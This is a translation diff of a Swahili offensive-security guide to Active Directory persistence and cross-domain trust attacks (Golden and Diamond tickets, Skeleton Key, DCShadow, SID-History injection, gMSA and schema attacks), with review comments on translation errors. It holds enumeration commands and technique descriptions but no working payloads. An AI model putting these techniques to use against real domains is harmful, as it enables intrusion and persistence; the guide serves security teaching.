Mara mshambuliaji anapopata hash hii, anaweza kuunda **TGTs** kwa akaunti yoyote anayotaka (Silver ticket attack).
Mara tu mdukuzi anapopata hash hii, anaweza kuunda **TGTs** kwa akaunti yoyote anayotaka (shambulio la Silver ticket).


{{#ref}}
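Review bot: the second Golden Ticket sentence, in both the old and the new line, labels forging TGTs for any account with the krbtgt hash as "(shambulio la Silver ticket)"; that is the Golden Ticket attack itself. The Silver Ticket paragraph two hunks above defines a Silver Ticket as a forged TGS for one service using that service's account hash, so the parenthesis should read "(shambulio la Golden ticket)" or be dropped. The new line does correctly remove the stray "lahat" from the old one.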
@ -450,7 +451,7 @@ golden-ticket.md

### Diamond Ticket

Hizi ni kama golden tickets zilizofunguliwa kwa njia zinazoweza **bypass common golden tickets detection mechanisms.**
Hizi ni kama golden tickets lakini zinaufanywa kwa njia inayoweza **bypass common golden tickets detection mechanisms.**


{{#ref}}
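Review bot: "zinaufanywa" in the new Diamond Ticket line is a typo; "zinatengenezwa kwa njia inayoweza ..." (crafted in a way that can ...) is the intended reading. Note the old line's "zilizofunguliwa" literally means "opened", so the new wording is the one to fix rather than revert to.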
@ -459,7 +460,7 @@ diamond-ticket.md

### **Certificates Account Persistence**

**Kuwa na certificates za akaunti au uwezo wa kuzi-request** ni njia nzuri ya kuweka persistence kwenye akaunti ya mtumiaji (hata kama anabadilisha password):
**Kuwa na certificates za akaunti au uwezo wa kuziomba** ni njia nzuri ya kukaa persist kwenye akaunti ya mtumiaji (hata kama anabadilisha password):


{{#ref}}
@ -468,7 +469,7 @@ ad-certificates/account-persistence.md

### **Certificates Domain Persistence**

**Kutumia certificates pia inaruhusu persistence kwa privileges za juu ndani ya domain:**
**Kutumia certificates pia inawezekana kuweka persistence kwa privileges za juu ndani ya domain:**


{{#ref}}
@ -477,13 +478,13 @@ ad-certificates/domain-persistence.md

### AdminSDHolder Group

The **AdminSDHolder** object katika Active Directory inahakikisha usalama wa **privileged groups** (kama Domain Admins na Enterprise Admins) kwa kutumia Access Control List (ACL) ya kawaida kwa vikundi hivi ili kuzuia mabadiliko yasiyoruhusiwa. Hata hivyo, kipengele hiki kinaweza kutumiwa vibaya; ikiwa mshambuliaji atabadilisha ACL ya AdminSDHolder ili kumpa mtumiaji wa kawaida ufikiaji kamili, mtumiaji huyo atapata udhibiti mpana juu ya vikundi vyote vya privileged. Kipengele hiki cha usalama, kilichokusudiwa kuwalinda, kinaweza hivyo kuleta matokeo mabaya isipokuwa kinadhibitiwa kwa karibu.
Kituo cha **AdminSDHolder** katika Active Directory kinahakikisha usalama wa **privileged groups** (kama Domain Admins na Enterprise Admins) kwa kutumia Access Control List (ACL) ya kawaida kwenye makundi haya ili kuzuia mabadiliko yasiyoruhusiwa. Hata hivyo, kipengele hiki kinaweza kutumika vibaya; ikiwa mdukuzi ata badilisha ACL ya AdminSDHolder kumpa mtumiaji wa kawaida ufikiaji kamili, mtumiaji huyo atapata udhibiti mkubwa juu ya makundi yote yaliyofaidika. Hatua hii ya usalama, iliyokusudiwa kulinda, inaweza hivyo kurejesha matokeo mabaya, kuruhusu ufikiaji usioidhinishwa isipokuwa ikifuatiliwa kwa karibu.

[**More information about AdminDSHolder Group here.**](privileged-groups-and-token-privileges.md#adminsdholder-group)

### DSRM Credentials

Katikati ya kila **Domain Controller (DC)**, kuna akaunti ya **local administrator**. Kwa kupata admin rights kwenye mashine kama hiyo, hash ya local Administrator inaweza kuchukuliwa kwa kutumia **mimikatz**. Baadaye, marekebisho ya registry yanahitajika ili **enable the use of this password**, kuruhusu ufikiaji wa mbali kwa akaunti ya local Administrator.
Katikati ya kila **Domain Controller (DC)**, kuna akaunti ya **local administrator**. Kwa kupata haki za admin kwenye mashine kama hiyo, hash ya Local Administrator inaweza kutolewa kwa kutumia **mimikatz**. Baadaye, mabadiliko kwenye registry ni muhimu ili **enable the use of this password**, kuruhusu ufikiaji wa mbali kwa akaunti ya Local Administrator.


{{#ref}}
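Review bot: the new AdminSDHolder line opens with "Kituo cha AdminSDHolder" (a station or centre) where the old line's "object" sense was right ("Kitu cha AdminSDHolder"), and "makundi yote yaliyofaidika" (groups that benefited) should be "makundi yote yenye mamlaka" (privileged groups); "ata badilisha" is also split ("atabadilisha"). The unchanged context link text still misspells the object as "AdminDSHolder" and is worth fixing while this paragraph is being touched.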
@ -492,7 +493,7 @@ dsrm-credentials.md

### ACL Persistence

Unaweza **kumpa** baadhi ya **special permissions** mtumiaji juu ya baadhi ya domain objects maalum ambazo zitamruhusu mtumiaji **escalate privileges in the future**.
Unaweza **give** baadhi ya **special permissions** kwa **user** juu ya vitu maalum vya domain ambazo zitamruhusu mtumiaji **escalate privileges in the future**.


{{#ref}}
@ -501,7 +502,8 @@ acl-persistence-abuse/

### Security Descriptors

The **security descriptors** hutumika **kuhifadhi** **permissions** ambazo **object** ina juu ya kitu fulani. Ikiwa unaweza kufanya tu **mabadiliko madogo** kwenye **security descriptor** ya object, unaweza kupata privileges za kuvutia juu ya object hiyo bila kuwa mwanachama wa kikundi chenye vibali.
**security descriptors** zinatumika **kuhifadhi** **permissions** ambazo **object** ina **juu ya** object. Ikiwa unaweza kufanya **mabadiliko madogo** kwenye **security descriptor** ya object, unaweza kupata vibali vyenye faida juu ya object hiyo bila kuhitaji kuwa mwanachama wa kikundi chenye mamlaka.


{{#ref}}
security-descriptors.md
@ -509,7 +511,7 @@ security-descriptors.md

### Skeleton Key

Badilisha **LSASS** kwenye memory ili kuanzisha **neno la siri la ulimwengu wote (universal password)**, likiruhusu ufikiaji wa akaunti zote za domain.
Badilisha **LSASS** ndani ya memory ili kuweka **neno la siri la ulimwengu**, likiwa na ufikiaji wa akaunti zote za domain.


{{#ref}}
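Review bot: the new Skeleton Key line drops the "(universal password)" gloss that made "neno la siri la ulimwengu" unambiguous, and "likiwa na ufikiaji wa akaunti zote" (having access) loses the "allowing access" of the old line; prefer "neno la siri la jumla (universal password), linaloruhusu ufikiaji wa akaunti zote za domain".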
@ -519,7 +521,7 @@ skeleton-key.md
### Custom SSP

[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/index.html#security-support-provider-interface-sspi)\
Unaweza kuunda SSP yako mwenyewe ili **capture** kwa **clear text** credentials zinazotumika kufikia mashine.
Unaweza kuunda **SSP** yako mwenyewe ili **capture** kwa **clear text** **credentials** zinazotumika kuingia kwenye mashine.


{{#ref}}
@ -528,8 +530,9 @@ custom-ssp.md

### DCShadow

Inarejesha kama **Domain Controller mpya** ndani ya AD na kulitumia kusukuma attributes (SIDHistory, SPNs...) kwa vitu vilivyotajwa **bila** kuacha **logs** kuhusu **modifications**. Unahitaji DA privileges na kuwa ndani ya **root domain**.\
Kumbuka kwamba ikiwa utatumia data zisizo sahihi, logs mbaya zitaonekana.
Inasajili **Domain Controller** mpya katika AD na kuitumia **push attributes** (SIDHistory, SPNs...) kwa vitu vilivyobainishwa **bila** kuacha **logs** kuhusu **mabadiliko**. Unahitaji DA privileges na kuwa ndani ya **root domain**.\
Kumbuka kuwa ikiwa utatumia data isiyo sahihi, logs mbaya zitajitokeza.


{{#ref}}
dcshadow.md
@ -537,71 +540,72 @@ dcshadow.md
|
||||
|
||||
### LAPS Persistence
|
||||
|
||||
Hapo awali tumependekeza jinsi ya kuescalate privileges ikiwa una **permission za kutosha kusoma LAPS passwords**. Hata hivyo, password hizi pia zinaweza kutumika kuendelea kuwa na persistence.\
|
||||
Hapo awali tumetoa jinsi ya ku-escalate privileges ikiwa una **enough permission to read LAPS passwords**. Hata hivyo, nywila hizi zinaweza pia kutumika kwa **maintain persistence**.\
|
||||
Angalia:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
laps.md
|
||||
{{#endref}}
|
||||
|
||||
## Forest Privilege Escalation - Domain Trusts
|
||||
|
||||
Microsoft inaona **Forest** kama mipaka ya usalama. Hii ina maana kwamba **kuharibu domain moja kunaweza kusababisha Forest nzima kuathiriwa**.
|
||||
Microsoft inaona **Forest** kama mpaka wa usalama. Hii ina maana kwamba **kuathiri domain moja kunaweza kusababisha kuathiri Forest yote**.
|
||||
|
||||
### Basic Information
|
||||
|
||||
A [**domain trust**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>) ni mfumo wa usalama unaomruhusu mtumiaji kutoka **domain** moja kufikia rasilimali katika **domain** nyingine. Kwa msingi huo inaunda uunganisho kati ya mifumo ya uthibitisho ya domain zote mbili, ikiruhusu uhakiki wa uthibitisho kuendelea kwa urahisi. Wakati domain zinapounda trust, zinabadilisha na kuhifadhi funguo maalum ndani ya **Domain Controllers (DCs)**, ambazo ni muhimu kwa uadilifu wa trust.
|
||||
[**domain trust**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>) ni mfumo wa usalama unaowezesha mtumiaji kutoka **domain** moja kupata rasilimali katika **domain** nyingine. Inaunda muunganiko kati ya mifumo ya authentication ya domains mbili, ikiruhusu uhakiki wa authentication kuendelea kwa urahisi. Wakati domains zinaweka trust, zinabadilisha na kuweka maalum **keys** ndani ya **Domain Controllers (DCs)** zao, ambazo ni muhimu kwa uaminifu wa trust.
|
||||
|
||||
Katika hali ya kawaida, ikiwa mtumiaji anataka kufikia service katika **trusted domain**, awali lazima aombe ticket maalum inayoitwa **inter-realm TGT** kutoka kwa DC ya domain yao. TGT hii imekryptiwa kwa **trust key** ambayo domain zote mbili zimekubaliana. Mtumiaji kisha aniwasilisha inter-realm TGT hii kwa **DC ya trusted domain** ili kupata service ticket (**TGS**). Baada ya DC ya trusted domain kuthibitisha inter-realm TGT kwa kutumia trust key yao na ikiwa ni sahihi, itatoa TGS, ikimpa mtumiaji ufikiaji wa service.
|
||||
Katika matukio ya kawaida, ikiwa mtumiaji anataka kupata huduma katika **trusted domain**, lazima kwanza aombe ticket maalum inayoitwa **inter-realm TGT** kutoka DC ya domain yake. TGT hii imefungwa kwa **key** iliyoshirikiwa ambayo domains zote mbili zimekubaliana. Mtumiaji kisha anatumia inter-realm TGT hii kwa **DC ya trusted domain** kupata service ticket (**TGS**). Baada ya inter-realm TGT kuthibitishwa na DC ya trusted domain, itatoa TGS, ikimpa mtumiaji ufikiaji wa huduma.
|
||||
|
||||
**Steps**:
|
||||
|
||||
1. A **client computer** katika **Domain 1** inaanza mchakato kwa kutumia **NTLM hash** yake kuomba **Ticket Granting Ticket (TGT)** kutoka kwa **Domain Controller (DC1)**.
|
||||
2. DC1 hutolewa TGT mpya ikiwa client imethibitishwa kwa mafanikio.
|
||||
3. Client kisha inaomba **inter-realm TGT** kutoka DC1, ambayo inahitajika kufikia rasilimali katika **Domain 2**.
|
||||
4. Inter-realm TGT imekryptiwa kwa **trust key** iliyoshirikiwa kati ya DC1 na DC2 kama sehemu ya two-way domain trust.
|
||||
5. Client inabeba inter-realm TGT kwenda kwa **Domain 2's Domain Controller (DC2)**.
|
||||
6. DC2 inathibitisha inter-realm TGT kwa kutumia shared trust key na, ikiwa sahihi, inatoa **Ticket Granting Service (TGS)** kwa server katika Domain 2 ambayo client anataka kufikia.
|
||||
7. Mwishowe, client inawasilisha TGS hii kwa server, ambayo imekryptiwa na hash ya akaunti ya server, ili kupata ufikiaji wa service katika Domain 2.
|
||||
1. Kompyuta ya **client** katika **Domain 1** inaanzisha mchakato kwa kutumia **NTLM hash** yake kuomba **Ticket Granting Ticket (TGT)** kutoka kwa **Domain Controller (DC1)**.
|
||||
2. DC1 hutoa TGT mpya ikiwa client imefanikiwa kuthibitishwa.
|
||||
3. Kisha client inamuomba **inter-realm TGT** kutoka DC1, ambayo inahitajika ili kupata rasilimali katika **Domain 2**.
|
||||
4. Inter-realm TGT imefungwa kwa **trust key** iliyoshirikiwa kati ya DC1 na DC2 kama sehemu ya trust ya mwelekeo wa pande mbili.
|
||||
5. Client inachukua inter-realm TGT kwenda kwa **Domain 2's Domain Controller (DC2)**.
|
||||
6. DC2 inathibitisha inter-realm TGT kwa kutumia trust key iliyoshirikiwa na, ikiwa ni halali, hutoa **Ticket Granting Service (TGS)** kwa server katika Domain 2 ambayo client anataka kufikia.
|
||||
7. Mwishowe, client inawasilisha TGS hii kwa server, ambayo imefungwa kwa hash ya account ya server, ili kupata ufikiaji wa huduma katika Domain 2.
|
||||
|
||||
### Different trusts
|
||||
|
||||
Ni muhimu kutambua kwamba **trust inaweza kuwa one way au two ways**. Katika uchaguzi wa two ways, domain zote mbili zitakuwa zinamtumaini kila mmoja, lakini katika uhusiano wa **one way** moja ya domain itakuwa **trusted** na nyingine itakuwa **trusting** domain. Katika kesi ya mwisho, **utakuwa na uwezo wa kufikia rasilimali ndani ya trusting domain kutoka trusted domain pekee**.
|
||||
Ni muhimu kutambua kwamba **trust inaweza kuwa 1 way au 2 ways**. Katika chaguo la 2 ways, domains zote mbili zitakuwa zinaaminiana, lakini katika uhusiano wa **1 way** moja ya domains itakuwa **trusted** na nyingine itakuwa **trusting** domain. Katika kesi ya mwisho, **utakuwa na uwezo wa kupata rasilimali ndani ya trusting domain kutoka trusted domain tu**.
|
||||
|
||||
Iwapo Domain A inamtumaini Domain B, A ni trusting domain na B ni trusted. Zaidi ya hayo, katika **Domain A**, hii itakuwa **Outbound trust**; na katika **Domain B**, hii itakuwa **Inbound trust**.
|
||||
Ikiwa Domain A inamtumaini Domain B, A ndiye trusting domain na B ndiye trusted. Zaidi ya hayo, katika **Domain A**, hii itakuwa **Outbound trust**; na katika **Domain B**, hii itakuwa **Inbound trust**.
|
||||
|
||||
**Different trusting relationships**
|
||||
|
||||
- **Parent-Child Trusts**: Hili ni mpangilio wa kawaida ndani ya forest ileile, ambapo child domain kwa kawaida ina two-way transitive trust na parent domain yake. Kwa kifupi, hii inamaanisha kwamba maombi ya uthibitisho yanaweza kusafiri kwa urahisi kati ya parent na child.
|
||||
- **Cross-link Trusts**: Zinajulikana kama "shortcut trusts," hizi zinatengwa kati ya child domains ili kuharakisha mchakato wa referral. Katika forests tata, referrals za uthibitisho kwa kawaida zinahitaji kusafiri hadi root ya forest kisha kushuka hadi domain inayolengwa. Kwa kuunda cross-links, safari inafupishwa, jambo lenye manufaa katika mazingira yaliyotawanyika kijiografia.
|
||||
- **External Trusts**: Hizi zimeratibiwa kati ya domains tofauti, zisizohusiana na ni non-transitive kwa asili. Kulingana na [Microsoft's documentation](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>), external trusts zinatumika kufikia rasilimali katika domain nje ya current forest ambayo haijumuishwaji na forest trust. Usalama unaimarishwa kupitia SID filtering kwa external trusts.
|
||||
- **Tree-root Trusts**: Trusts hizi zinaanzishwa moja kwa moja kati ya forest root domain na tree root mpya iliyoongezwa. Ingawa hazikufunuliwa sana, tree-root trusts ni muhimu kwa kuongeza miti mipya ya domain kwenye forest, zikiruhusu kudumisha jina la domain la kipekee na kuhakikisha two-way transitivity. Taarifa zaidi inaweza kupatikana katika [Microsoft's guide](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>).
|
||||
- **Forest Trusts**: Aina hii ya trust ni two-way transitive trust kati ya forest root domains mbili, pia ikitekeleza SID filtering ili kuongeza hatua za usalama.
|
||||
- **MIT Trusts**: Trusts hizi zinaanzishwa na non-Windows, [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domains. MIT trusts ni maalum zaidi na zinahudumia mazingira yanayohitaji ushirikiano na mifumo ya Kerberos nje ya ekosistimu ya Windows.
|
||||
- **Parent-Child Trusts**: Hii ni mpangilio wa kawaida ndani ya forest hiyo hiyo, ambapo child domain ina automatisch two-way transitive trust na parent domain. Hii inamaanisha kuwa maombi ya authentication yanaweza kusafiri kwa urahisi kati ya parent na child.
|
||||
- **Cross-link Trusts**: Zinajulikana kama "shortcut trusts," zinaundwa kati ya child domains ili kuharakisha mchakato wa marejeo. Katika forests tata, marejeo ya authentication kawaida yanapaswa kusafiri hadi kwenye mizizi ya forest kisha kushuka hadi domain lengwa. Kwa kuunda cross-links, safari hiyo inafupishwa, jambo lenye faida hasa katika mazingira yaliyoenea kimwili.
|
||||
- **External Trusts**: Hizi zimeanzishwa kati ya domains tofauti, zisizo na uhusiano na kwa asili si transitive. Kulingana na [Microsoft's documentation](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>), external trusts ni muhimu kwa kupata rasilimali katika domain nje ya forest ya sasa ambayo haijabunganishwa kwa forest trust. Usalama unaboreshwa kupitia SID filtering kwa external trusts.
|
||||
- **Tree-root Trusts**: Trusts hizi zinaanzishwa moja kwa moja kati ya forest root domain na tree root mpya iliyoongezwa. Ingawa hazionekani mara kwa mara, tree-root trusts ni muhimu kwa kuongeza miti mpya ya domain kwenye forest, zikiruhusu kudumisha jina la kipekee la domain na kuhakikisha transitivity ya pande mbili. Maelezo zaidi yanapatikana katika [Microsoft's guide](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>).
|
||||
- **Forest Trusts**: Aina hii ya trust ni two-way transitive trust kati ya forest root domains mbili, na pia inatekeleza SID filtering ili kuongeza hatua za usalama.
- **MIT Trusts**: Trusts hizi zinaanzishwa na domains za Kerberos zisizo za Windows, zinazoendana na [RFC4120](https://tools.ietf.org/html/rfc4120). MIT trusts ni maalum zaidi na zinahudumia mazingira yanayohitaji ujumuishaji na mifumo ya Kerberos nje ya ekosistimu ya Windows.
#### Other differences in **trusting relationships**
- Uhusiano wa trust unaweza pia kuwa **transitive** (A trust B, B trust C, basi A trust C) au **non-transitive**.
- Uhusiano wa trust unaweza kuwekwa kama **bidirectional trust** (pande zote zinatumiani) au kama **one-way trust** (moja tu inamtumaini mwingine).
- Uhusiano wa trust pia unaweza kuwa **transitive** (A trust B, B trust C, basi A trust C) au **non-transitive**.
- Uhusiano wa trust unaweza kuwekwa kama **bidirectional trust** (pande zote zinaaminiana) au kama **one-way trust** (mmoja tu anamtumaini mwingine).
### Attack Path
1. **Enumerate** uhusiano wa trusting
2. Angalia ikiwa kuna **security principal** (user/group/computer) ambaye ana **access** kwa rasilimali za **domain nyingine**, labda kupitia ACE entries au kwa kuwa katika vikundi vya domain nyingine. Tafuta **relationships across domains** (trust ilianzishwa kwa ajili ya hili pengine).
1. kerberoast katika kesi hii inaweza kuwa chaguo nyingine.
2. Angalia kama kuna **security principal** (user/group/computer) ana **access** kwa rasilimali za **domain nyingine**, labda kupitia ACE entries au kwa kuwa katika vikundi vya domain nyingine. Angalia **relationships across domains** (trust ilianzishwa kwa madhumuni haya huenda).
1. kerberoast katika hali hii inaweza kuwa chaguo lingine.
3. **Compromise** akaunti ambazo zinaweza **pivot** kupitia domains.
Wavamizi wanaweza kupata ufikiaji wa rasilimali katika domain nyingine kupitia njia kuu tatu:
Washambuliaji wanaweza kupata ufikiaji wa rasilimali katika domain nyingine kupitia mekanisimu tatu kuu:
- **Local Group Membership**: Principals wanaweza kuongezwa kwenye vikundi vya local kwenye mashine, kama “Administrators” group kwenye server, ikiwapa udhibiti mkubwa wa mashine hiyo.
- **Foreign Domain Group Membership**: Principals pia wanaweza kuwa wanachama wa vikundi ndani ya foreign domain. Hata hivyo, ufanisi wa njia hii unategemea aina ya trust na eneo la kikundi.
- **Access Control Lists (ACLs)**: Principals wanaweza kutajwa katika **ACL**, hasa kama entities katika **ACEs** ndani ya **DACL**, wakiwapa ufikiaji wa rasilimali maalum. Kwa wale wanaotaka kujifunza kwa undani mechanics za ACLs, DACLs, na ACEs, whitepaper iliyoitwa “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” ni rasilimali muhimu.
- **Local Group Membership**: Principals wanaweza kuongezwa kwenye vikundi vya ndani kwenye mashine, kama kikundi cha “Administrators” kwenye server, kuwaweka na udhibiti mkubwa juu ya mashine hiyo.
- **Foreign Domain Group Membership**: Principals pia wanaweza kuwa wanachama wa vikundi ndani ya domain ya kigeni. Hata hivyo, ufanisi wa mbinu hii hutegemea aina ya trust na wigo wa kikundi.
- **Access Control Lists (ACLs)**: Principals wanaweza kuorodheshwa katika **ACL**, hasa kama entities katika **ACEs** ndani ya **DACL**, wakiwapa ufikiaji wa rasilimali maalum. Kwa wale wanaotaka kuingia kwa undani zaidi kwenye mekanika za ACLs, DACLs, na ACEs, whitepaper iitwayo “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” ni rasilimali muhimu.
### Find external users/groups with permissions
Unaweza kuangalia **`CN=<user_SID>,CN=ForeignSecurityPrincipals,DC=domain,DC=com`** kupata foreign security principals katika domain. Hawa watakuwa user/group kutoka **external domain/forest**.
Unaweza kuangalia **`CN=<user_SID>,CN=ForeignSecurityPrincipals,DC=domain,DC=com`** ili kupata foreign security principals katika domain. Hawa watakuwa user/group kutoka **an external domain/forest**.
Unaweza kuchunguza hili kwa kutumia **Bloodhound** au powerview:
Unaweza kuangalia hili kwa kutumia **Bloodhound** au kwa kutumia powerview:
```powershell
# Get users that are i groups outside of the current domain
Get-DomainForeignUser
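# Review bot: the comment above, "Get users that are i groups outside of the current domain", should read "in groups"; further up, the Parent-Child Trusts line still carries the non-Swahili word "automatisch" (for "kiotomatiki"), which this translation pass left in place.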
@ -635,7 +639,7 @@ nltest /dclist:sub.domain.local
nltest /server:dc.sub.domain.local /domain_trusts /all_trusts
```
> [!WARNING]
> Kuna **2 trusted keys**, moja kwa ajili ya _Child --> Parent_ na nyingine kwa ajili ya _Parent_ --> _Child_.\
> Kuna **2 trusted keys**, moja kwa _Child --> Parent_ na nyingine kwa _Parent_ --> _Child_.\
> Unaweza kuona ile inayotumika na domain ya sasa kwa kutumia:
>
> ```bash
@ -645,7 +649,7 @@ nltest /server:dc.sub.domain.local /domain_trusts /all_trusts
#### SID-History Injection
Panda hadhi hadi Enterprise Admin katika domain ya child/parent kwa kuabusu trust kwa SID-History injection:
Panda hadhi kuwa Enterprise admin kwenye domain ya child/parent kwa kutumia trust na SID-History injection:
{{#ref}}
@ -654,26 +658,26 @@ sid-history-injection.md
#### Exploit writeable Configuration NC
Kuelewa jinsi Configuration Naming Context (NC) inaweza kutumiwa ni muhimu. Configuration NC inafanya kama hazina kuu ya data za konfigurishaji ndani ya forest katika mazingira ya Active Directory (AD). Data hii inariplikatwa kwa kila Domain Controller (DC) ndani ya forest, na DC zinazoweza kuandikwa zina nakala inayoweza kuandikwa ya Configuration NC. Ili kuitumia, lazima kuwa na **SYSTEM privileges on a DC**, bora DC wa child.
Ni muhimu kuelewa jinsi Configuration Naming Context (NC) inaweza kutumiwa. Configuration NC inafanya kazi kama hazina kuu ya data za configuration ndani ya forest katika mazingira ya Active Directory (AD). Data hii inaripukizwa kwa kila Domain Controller (DC) ndani ya forest, na writable DCs zinatunza nakala inayoweza kuandikwa ya Configuration NC. Ili kuifanyia exploit hii, mtu lazima awe na **SYSTEM privileges on a DC**, bora kuwa child DC.
**Link GPO to root DC site**
Container ya Sites ya Configuration NC inajumuisha taarifa kuhusu maeneo ya kompyuta zote zilizounganishwa na domain ndani ya AD forest. Kwa kufanya kazi ukiwa na **SYSTEM privileges on any DC**, wadukuzi wanaweza link GPOs kwa root DC sites. Kitendo hiki kinaweza kuhatarisha root domain kwa kubadilisha sera zinazotumika kwa maeneo haya.
Container ya Sites ya Configuration NC ina taarifa kuhusu sites za kompyuta zote zilizo joined kwenye domain ndani ya AD forest. Kwa kufanya kazi kwa SYSTEM privileges on any DC, mashambulizi yanaweza ku-link GPOs kwa root DC sites. Kitendo hiki kinaweza kudhoofisha root domain kwa kubadilisha policies zinazotumika kwa sites hizi.
Kwa maelezo ya kina, unaweza kusoma utafiti wa [Bypassing SID Filtering](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research).
Kwa taarifa za kina, unaweza kusoma utafiti kuhusu [Bypassing SID Filtering](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research).
**Compromise any gMSA in the forest**
Vector ya shambulio inahusisha kulenga gMSAs zilizo na ruhusa ndani ya domain. KDS Root key, muhimu kwa kuhesabu nywila za gMSAs, imehifadhiwa ndani ya Configuration NC. Ukiwa na **SYSTEM privileges on any DC**, inawezekana kupata KDS Root key na kuhesabu nywila za gMSA yoyote ndani ya forest.
Njia ya shambulio ni kulenga gMSA zenye hadhi ndani ya domain. KDS Root key, muhimu kwa kuhesabu passwords za gMSAs, imehifadhiwa ndani ya Configuration NC. Ukiwa na SYSTEM privileges on any DC, inawezekana kupata KDS Root key na kuhesabu passwords za gMSA yoyote ndani ya forest.
Uchambuzi wa kina na mwongozo wa hatua kwa hatua unaweza kupatikana katika:
Uchambuzi wa kina na mwongozo hatua kwa hatua unaweza kupatikana katika:
{{#ref}}
golden-dmsa-gmsa.md
{{#endref}}
Shambulio la ziada la delegated MSA (BadSuccessor – abusing migration attributes):
Complementary delegated MSA attack (BadSuccessor – abusing migration attributes):
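Review bot: the replacement line "Complementary delegated MSA attack (BadSuccessor – abusing migration attributes):" puts this sentence back into English and undoes the Swahili wording it replaces ("Shambulio la ziada la delegated MSA ..."); keep the Swahili version. The revised Sites and gMSA paragraphs in this hunk also drop the **SYSTEM privileges on any DC** bold that the earlier wording carried (the same happens to "SYSTEM privileges" in the later Schema change paragraph); restore the emphasis so the Swahili text keeps the source's formatting.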
{{#ref}}
@ -684,15 +688,15 @@ Utafiti wa ziada wa nje: [Golden gMSA Trust Attacks](https://improsec.com/tech-b
**Schema change attack**
Njia hii inahitaji uvumilivu, kusubiri uundaji wa vitu vipya vya AD vyenye ruhusa za juu. Ukiwa na **SYSTEM privileges**, mshambuliaji anaweza kubadilisha AD Schema ili kumuwezesha mtumiaji yeyote kupata udhibiti kamili juu ya madarasa yote. Hii inaweza kusababisha upatikanaji usioidhinishwa na udhibiti wa vitu vipya vya AD.
Mbinu hii inahitaji uvumilivu, kusubiri uundaji wa vitu vipya vya AD zenye hadhi. Ukiwa na SYSTEM privileges, mshambuliaji anaweza kubadilisha AD Schema ili kumpa mtumiaji yeyote udhibiti kamili juu ya classes zote. Hii inaweza kusababisha ufikiaji usioidhinishwa na udhibiti wa vitu vipya vilivyoundwa vya AD.
Kusoma zaidi kunaweza kupatikana kwenye [Schema Change Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent).
Soma zaidi kwenye [Schema Change Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent).
**From DA to EA with ADCS ESC5**
Udhaifu wa ADCS ESC5 unalenga kupata udhibiti wa vitu vya Public Key Infrastructure (PKI) ili kuunda template ya cheti inayoruhusu authentication kama mtumiaji yeyote ndani ya forest. Kwa kuwa vitu vya PKI viko katika Configuration NC, ku-compromise DC wa child aliye writeable kunaruhusu utekelezaji wa ESC5 attacks.
Udhaifu wa ADCS ESC5 unalenga udhibiti wa vitu vya Public Key Infrastructure (PKI) ili kuunda template ya cheti inayoruhusu authentication kama mtumiaji yeyote ndani ya forest. Kwa kuwa vitu vya PKI vipo katika Configuration NC, kudhoofisha writable child DC kunaruhusu utekelezaji wa mashambulizi ya ESC5.
Maelezo zaidi kuhusu hili yanapatikana kwenye [From DA to EA with ESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c). Katika mazingira yasiyo na ADCS, mshambuliaji anaweza kutengeneza vipengele vinavyohitajika, kama ilivyoelezwa katika [Escalating from Child Domain Admins to Enterprise Admins](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/).
Taarifa zaidi zinaweza kusomwa kwenye [From DA to EA with ESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c). Katika mazingira yasiyo na ADCS, mshambuliaji ana uwezo wa kuanzisha vipengele vinavyohitajika, kama ilivyojadiliwa katika [Escalating from Child Domain Admins to Enterprise Admins](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/).
### External Forest Domain - One-Way (Inbound) or bidirectional
```bash
@ -705,13 +709,14 @@ TrustDirection : Inbound --> Inboud trust
WhenCreated : 2/19/2021 10:50:56 PM
WhenChanged : 2/19/2021 10:50:56 PM
```
Katika tukio hili **domaini yako imeaminishwa** na nyingine ya nje ikikupa **idhinisho zisizojulikana** juu yake. Utahitaji kubaini **ni principals gani katika domaini yako wana upatikanaji gani juu ya domaini ya nje** na kisha kujaribu ku-exploit:
Katika senario hii **domain yako inategemewa** na domain ya nje ikikupa **ruhusa zisizojulikana** juu yake. Utahitaji kubaini **ni principals gani wa domain yako wana ruhusa gani juu ya domain ya nje** kisha kujaribu kui-exploit:
{{#ref}}
external-forest-domain-oneway-inbound.md
{{#endref}}
### Domaini ya Msitu ya Nje - Njia Moja (Outbound)
### External Forest Domain - One-Way (Outbound)
```bash
Get-DomainTrust -Domain current.local
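# Review bot: the hunk header context "TrustDirection : Inbound --> Inboud trust" has a typo in the annotation ("Inboud" for "Inbound"); the matching outbound sample reads "Outbound --> Outbound trust", so fix this one for consistency.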
@ -723,35 +728,35 @@ TrustDirection : Outbound --> Outbound trust
WhenCreated : 2/19/2021 10:15:24 PM
WhenChanged : 2/19/2021 10:15:24 PM
```
Katika senario hii **your domain** inakuwa **trusting** baadhi ya **privileges** kwa **principal** kutoka **different domains**.
Katika senario hii **your domain** inakuwa **trusting** baadhi ya **privileges** kwa mhusika kutoka **different domains**.
Hata hivyo, wakati **a domain is trusted** na domain inayomwamini, domain iliyothibitishwa **creates a user** yenye **predictable name** inayotumia kama **password the trusted password**. Hii ina maana kwamba inawezekana **access a user from the trusting domain to get inside the trusted one** ili kuitafuta na kujaribu kuongeza privileges zaidi:
